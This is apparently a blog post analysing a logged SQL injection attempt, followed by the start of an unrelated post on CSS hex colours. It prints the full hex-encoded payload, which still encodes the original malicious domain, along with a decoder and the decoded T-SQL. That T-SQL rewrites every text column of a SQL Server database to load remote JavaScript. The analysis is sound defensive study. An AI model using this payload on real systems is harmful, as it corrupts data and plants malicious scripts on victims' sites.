Hexed SQL – Analysis of a hack attempt

A few days ago, I was browsing through my web site logs. I was scrolling along when I saw an interesting entry (warning, long horizontal scrolling ahead. Please click through to post for easier reading):

/2008/07/15/are-you-malleable-code-editor/?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S)

I thought that looked peculiar, but didn’t think much of it. It wasn’t until the next day that I felt that was a hack attempt. Yeah, my spider sense wasn’t doing very well…

So I took a closer look at it. From the keywords “DECLARE”, “CHAR(4000)”, “SET”, “CAST” and “EXEC”, I gathered this might be an SQL statement. But what’s the long string of characters doing?

Notice the “0x” in the CAST command. Hmm… hexadecimal? To prove this, I wrote a mini program:

StreamWriter sw = new StreamWriter("vince.txt");
string s = "4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72";
int i;
char c;
for (i = 0; i < s.Length; i += 2)
{
    c = Convert.ToChar(Convert.ToInt32(string.Format("0x{0}{1}", s[i], s[i + 1]), 16));
    sw.Write(c);
}
sw.WriteLine();
sw.Close();

That might not be the best way to manipulate hexadecimal, but you should definitely not follow this example.

Lo and behold, I got this (reformatted for legibility):

DECLARE @T varchar(255),@C varchar(4000)

DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)

OPEN Table_Cursor
FETCH NEXT FROM  Table_Cursor INTO @T,@C

WHILE(@@FETCH_STATUS=0)
BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://somesite.cn/csrss/w.js"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://somesite.cn/csrss/w.js"></script><!--''')
FETCH NEXT FROM  Table_Cursor INTO @T,@C
END

CLOSE Table_Cursor
DEALLOCATE Table_Cursor

It was a chunk of SQL statements in hexadecimal! So, let's look at it more closely. Let's start with this part:

select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)

sysobjects and syscolumns are system database tables. This automatically rules out Oracle as the database, since Oracle uses all_tables and all_tab_columns. MySQL uses INFORMATION_SCHEMA.TABLES and INFORMATION_SCHEMA.COLUMNS respectively.

That leaves me with Sybase and SQL Server, the other 2 databases that I'm familiar with. Then I saw the query uses xtype. Aha! Sybase's sysobjects table doesn't have the xtype column; it only has the type column!

And so, I deduced that this was probably an attack on web sites running on SQL Servers.

Let's look at the query again. This part a.xtype='u' in the where clause searches for user tables (or tables created by the user or associated applications). This part:

b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167

needs a little more explanation. My digging into the innards of syscolumns tells me that 99, 35, 231 and 167 corresponds to ntext, text, nvarchar, varchar respectively.

Hmm... those 4 look familiar... Oh right, they're data types for storing text in databases. I have a theory as to why char and nchar are not included, but let's focus on the query first.

So in English, the query retrieves all columns of text data type of all user-created database tables. Then in the while loop, an update command in executed. Basically, it updates all the text columns in all the user-created tables to a "certain value". Let's look at this "certain value" (yes, this is THE HACK), shall we?

THE HACK starts with two single quotes, so it becomes just one single quote because of the SQL escape. Then it ends with double quotes and a greater than sign. Huh? Then there's a </title> end tag. This implies there's a starting title tag somewhere.

From this, I deduce that the hacker is assuming (or hoping) one of those text columns will be used in the title tag. This implies that the text columns are assumed to be of moderate length. char and nchar types are not usually used for these types of data, so they're left out (or the hacker didn't think they're worthy). At least that's my theory...

Moving on, we see that there's a script tag. Isn't there always? *smile* The Javascript file comes from a dubious web site from China, based on the web site address. Yes, I've anonymised it so the actual dubious site's address isn't shown (to prevent giving power to the hacker and to lower the chances of search engines banning me). You're welcome to use the C# code above to decipher the chunk of hexadecimal and find out yourself. But please, don't go to that site!

Now I don't quite understand what's with the where clause in the update statement in the exec command. Why didn't the hacker simply update all the columns instead of adding a where clause search filter? It ends up the same anyway... Perhaps it's to mix up the encoded hexadecimal so it's not similar to past attempts...

Anyway, basically THE HACK updates text columns such that if one of the text columns is used in the title tag, the web page loads the malicious Javascript and ends rendering the rest of the page. I have no idea what the Javascript file will do, and I don't intend to find out. The additional damage is the lost of data in the text columns, which is probably not as fatal as the Javascript.

And that's the end of my analysis. I hope that even if it's not relevant to you, you've learnt something from the thought processes that go into this hack investigation.

CSS colours and hexadecimal

CSS, which stands for Cascading Style Sheets, allows you to work design wonders with your HTML. A web page is split into two parts, the design and look versus the data and functions of the page. And CSS is the main driving force behind the former. Aaron’s article gives an excellent introduction to this separation of form and function of a web page. Then stroll through the breathtaking CSS Zen Garden to gain inspiration for your CSS design project.

So why do you need to know anything about hexadecimals? Because a major component of CSS values come from declaring colours. And colours are represented in mainly hexadecimal values.

In CSS, colours are commonly represented as RGB triplets, such as #336699. RGB is a short form of Red, Green and Blue. A discussion of colour theory and representation is beyond the scope of this article. Simply know the six characters (not including the hex sign #) is divided into 3 parts. First two characters represent red, middle two for green and last two for blue.

These two-character parts are the hexadecimal values of the colour component (red or green or blue), and range from 0 to 255. The higher the number, the more of that colour component. So #0000ff represents pure blue. If it’s still new to you, rest easy, because most standard image processing software has a hexadecimal colour converter.

There are other ways of declaring colours in style sheets, such as color:Red. To a non-technical person, that is very useful. But we’re programmers. What if we need to dynamically generate the style sheet?